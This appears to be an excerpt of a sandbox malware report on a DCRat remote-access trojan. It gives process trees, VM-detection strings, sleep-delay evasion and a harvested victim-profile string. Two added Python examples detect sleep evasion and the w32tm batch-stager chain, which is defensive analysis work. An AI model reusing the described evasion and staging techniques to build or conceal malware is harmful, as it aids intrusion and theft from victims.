Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593624
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593487
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593359
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593249
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593140
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 593031
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 592921
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 592812
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 592702
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 592540
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 592427
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 592046
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 591878
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 591732
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 591624
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 591515
Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe | Thread delayed: delay time: 922337203685477
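A reading note on the delay rows: Joe Sandbox prints these values with an "s" suffix, but the magnitudes are milliseconds (600000 is ten minutes, 3600000 one hour, and 922337203685477 is TimeSpan.MaxValue in milliseconds, i.e. a .NET thread parked indefinitely); the negative sign in the "Thread sleep time" rows marks a relative interval. The strictly decreasing series on TID 1448 (597103, 596999, 596859, ...) is consistent with a loop that recomputes the time left until a fixed deadline after every wake-up, which is how a sample keeps waiting even when a sandbox returns early from Sleep. The block below is an added example, not part of the report or of the sample's code, that scores such a trace the way an analyst would: single sleeps over the report's own 30 s cut-off, the cumulative requested delay, the infinite-sleep sentinel, and per-thread descending runs. The run length of five is an assumed tuning value; the sample input is the TID-bearing rows above.

```python
"""Score the thread-delay rows of a sandbox trace for sleep-based evasion.

Input: (tid, delay_ms) pairs in trace order.  The report shows the numbers
with an 's' suffix, but their magnitudes are milliseconds, and that is what
this code assumes.
"""
from collections import defaultdict

# TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10000):
# a .NET thread that sleeps "forever", e.g. Thread.Sleep(TimeSpan.MaxValue).
DOTNET_MAX_SLEEP_MS = 922337203685477
SANDBOX_THRESHOLD_MS = 30_000   # the report's own ">= -30000s" cut-off
DEADLINE_RUN = 5                # assumed tuning: descending long sleeps in a row


def analyse_delays(events, threshold_ms=SANDBOX_THRESHOLD_MS, run_len=DEADLINE_RUN):
    """Return counts, cumulative requested delay and the threads that show a
    deadline-recomputing loop (a run of descending long sleeps on one thread)."""
    events = list(events)
    per_tid = defaultdict(list)
    for tid, ms in events:
        per_tid[tid].append(ms)

    finite = [ms for _, ms in events if ms != DOTNET_MAX_SLEEP_MS]
    result = {
        "long_sleeps": sum(1 for ms in finite if ms >= threshold_ms),
        "infinite_sleeps": len(events) - len(finite),
        "total_requested_s": sum(finite) / 1000,
        "deadline_loops": [],
    }
    for tid, seq in per_tid.items():
        # Each wake-up re-arms a slightly shorter sleep: the code is computing
        # deadline - now, so an early return from Sleep() buys the sandbox nothing.
        run = 1
        for prev, cur in zip(seq, seq[1:]):
            run = run + 1 if threshold_ms <= cur < prev else 1
            if run >= run_len:
                result["deadline_loops"].append(tid)
                break
    return result


# Constructed from the TID-bearing "Thread sleep time" rows above (values in ms).
SAMPLE = [(1448, 597103), (1448, 596999), (1448, 596859), (1448, 596733),
          (1448, 596623), (5316, 300000), (1448, 596515), (1448, 596406),
          (8152, DOTNET_MAX_SLEEP_MS)]

if __name__ == "__main__":
    print(analyse_delays(SAMPLE))
```

On the sample rows this reports eight long sleeps, one infinite sleep, about 4477 s of requested delay and a deadline loop on TID 1448. The practical consequence is that sleep patching alone is not enough for this sample; the sandbox clock (GetTickCount, QueryPerformanceCounter, DateTime.Now) has to advance together with the skipped sleeps.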
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File opened: C:\Users\user
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File opened: C:\Users\user\AppData
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File opened: C:\Users\user\AppData\Local
Source: DCRatBuild.exe, 00000001.00000002.1661019309.0000000002D89000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: gorkmTnChA.exe, KAdpNCgonFhCnlBRasdZerWl.exe1.11.dr, DCRatBuild.exe.0.dr, ApplicationFrameHost.exe.11.dr, KAdpNCgonFhCnlBRasdZerWl.exe.11.dr | Binary or memory string: Ag7PBDZHgFS
Source: SandeLLoCHECKER_Installer.msi.3.dr | Binary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: wscript.exe, 00000002.00000003.1774330336.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1704675568.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1704434925.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1704434925.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: webDriverintoDll.exe, 0000000B.00000002.1887165199.000000001BB7F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: w32tm.exe, 00000020.00000002.1894107714.000001FB1BCC7000.00000004.00000020.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2895305392.000000000119B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | API call chain: ExitProcess graph end node | graph_1-24968
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004AF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004AF838
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009946B0 GetLocalTime,CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,3_2_009946B0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0084F620 RoGetActivationFactory,LoadLibraryW,GetProcAddress,RoGetActivationFactory,LoadLibraryW,GetProcAddress,RoGetActivationFactory,LoadLibraryW,GetProcAddress,FreeLibrary,3_2_0084F620
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004B7DEE mov eax, dword ptr fs:[00000030h] 1_2_004B7DEE
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A3008B mov eax, dword ptr fs:[00000030h] 3_2_00A3008B
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A300CF mov eax, dword ptr fs:[00000030h] 3_2_00A300CF
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A2158A mov ecx, dword ptr fs:[00000030h] 3_2_00A2158A
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A158D7 mov esi, dword ptr fs:[00000030h] 3_2_00A158D7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004BC030 GetProcessHeap,1_2_004BC030
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Process token adjusted: Debug
Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004AF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004AF838
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004AF9D5 SetUnhandledExceptionFilter,1_2_004AF9D5
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004AFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004AFBCA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004B8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004B8EBD
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0087BBA0 __set_se_translator,SetUnhandledExceptionFilter,3_2_0087BBA0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A16466 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00A16466
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0087E600 __set_se_translator,SetUnhandledExceptionFilter,3_2_0087E600
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A1B023 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00A1B023
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Process created: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe "C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i c:\users\user\appdata\local\temp\{f123046a-2cbf-4743-a59b-e3d2751b5780}\51b5780\sandellochecker_installer.msi ai_setupexepath=c:\users\user\appdata\local\temp\sandellochecker_installer.exe setupexedir=c:\users\user\appdata\local\temp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1733667848 " ai_found_prereqs=".net framework 4.8 (web installer)"
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i c:\users\user\appdata\local\temp\{f123046a-2cbf-4743-a59b-e3d2751b5780}\51b5780\sandellochecker_installer.msi ai_setupexepath=c:\users\user\appdata\local\temp\sandellochecker_installer.exe setupexedir=c:\users\user\appdata\local\temp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1733667848 " ai_found_prereqs=".net framework 4.8 (web installer)"
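The cmd.exe /C <dropped .bat> -> chcp 65001 -> w32tm /stripchart /computer:localhost -> payload sequence in the tree above is a staple of DCRat's batch stagers: a stripchart against localhost synchronises nothing, it simply blocks for roughly period x samples seconds, which gives the script a delay without ping.exe or PowerShell. Below is an added detection example (mine, not from the report or from the sample) that runs over process-creation records such as Sysmon Event ID 1 and flags three things visible in this tree: w32tm used as a sleep under cmd.exe, that same cmd.exe then starting an executable from outside System32/SysWOW64, and a script host running a .vbe from a directory created directly under the drive root. The event list is constructed to mirror the tree above with shortened script names; the field names and rule names are my own.

```python
"""Flag the batch-stager idiom seen in the process tree above:
  cmd.exe /C <dropped .bat> -> chcp 65001 -> w32tm /stripchart /computer:localhost
                            -> <payload>.exe from a non-system directory
Input: process-creation records as dicts (pid, ppid, image, cmd), e.g. Sysmon
Event ID 1 after field renaming.  The sample records below are constructed.
"""
import re
from collections import defaultdict

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# First quoted or bare path ending in a script-host extension (cmd is lower-cased first).
SCRIPT_RE = re.compile(r'"?([a-z]:\\[^"]+?\.(?:vbe|vbs|js|jse|wsf))"?')


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) alerts for the records in `events`."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    alerts = []
    for e in events:
        image, cmd = basename(e["image"]), e["cmd"].lower()
        parent = by_pid.get(e["ppid"])

        # Rule 1: "stripchart" against localhost synchronises nothing; with
        # /period:N /samples:M it just blocks for about N*M seconds, a sleep
        # primitive that needs neither ping.exe nor PowerShell.
        if (image == "w32tm.exe" and "/stripchart" in cmd
                and "/computer:localhost" in cmd
                and parent is not None and basename(parent["image"]) == "cmd.exe"):
            alerts.append(("w32tm_as_sleep", e["pid"]))

            # Rule 2: the same cmd.exe also starts an .exe outside System32 /
            # SysWOW64, so the delay was padding in front of the payload launch.
            for sib in children[parent["pid"]]:
                img = sib["image"].lower()
                if (sib["pid"] != e["pid"] and img.endswith(".exe")
                        and not img.startswith(SYSTEM_DIRS)):
                    alerts.append(("delay_then_launch", sib["pid"]))

        # Rule 3: a script host running a script from a directory created
        # directly under the drive root (C:\<name>\x.vbe), a staging layout.
        if image in ("wscript.exe", "cscript.exe"):
            m = SCRIPT_RE.search(cmd)
            if m and m.group(1).count("\\") == 2:
                alerts.append(("script_from_root_dir", e["pid"]))
    return alerts


EVENTS = [  # constructed, modelled on the tree above; script names shortened
    {"pid": 10, "ppid": 1, "image": r"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe",
     "cmd": r'"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"'},
    {"pid": 11, "ppid": 10, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\stage1.vbe"'},
    {"pid": 12, "ppid": 11, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\stage2.bat" "'},
    {"pid": 13, "ppid": 12, "image": r"C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe",
     "cmd": r'"C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"'},
    {"pid": 14, "ppid": 13, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat"'},
    {"pid": 15, "ppid": 14, "image": r"C:\Windows\System32\chcp.com", "cmd": "chcp 65001"},
    {"pid": 16, "ppid": 14, "image": r"C:\Windows\System32\w32tm.exe",
     "cmd": "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"},
    {"pid": 17, "ppid": 14,
     "image": r"C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe",
     "cmd": r'"C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"'},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Rule 1 is the high-confidence signal: legitimate w32tm use is /resync or /query, and a stripchart against localhost has no administrative purpose. Rule 2 deliberately keeps Program Files out of the allow-list because the payload here lives under a Program Files subfolder that no installer would normally populate with an executable.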
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Code function: 3_2_0095BF10 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle, 3_2_0095BF10
Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.00000000034D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .4",5,1,"","user","562258","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\reference assemblies\\Microsoft","_SL8D (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.22
Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003427000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.00000000034D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","562258","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\reference assemblies\\Microsoft","_SL8D (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: 1_2_004AF654 cpuid 1_2_004AF654
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe Code function: GetLocaleInfoW,GetNumberFormatW, 1_2_004AAF0F
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 3_2_0098A660
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Queries volume information: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe VolumeInformation
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
